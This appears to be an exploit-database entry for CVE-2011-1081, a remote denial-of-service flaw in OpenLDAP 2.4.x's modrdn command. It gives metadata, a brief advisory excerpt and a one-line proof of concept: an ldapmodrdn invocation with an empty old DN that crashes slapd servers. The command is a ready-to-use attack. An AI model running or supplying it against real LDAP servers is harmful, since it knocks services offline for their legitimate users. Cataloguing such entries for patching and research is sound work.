[] NeoSense

OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service

Author: Serge Dubrouski
type: dos
platform: linux
port: 
date_added: 2011-01-03 
date_updated: 2014-12-03 
verified: 1 
codes: CVE-2011-1081;OSVDB-72530 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/46831/info

OpenLDAP is prone to a remote denial-of-service vulnerability that affects the 'modify relative distinguished name' (modrdn) command.

Attackers can exploit this issue to deny service to legitimate users by crashing affected 'slapd' servers.

ldapmodrdn -x -H ldap://ldapserver -r '' o=test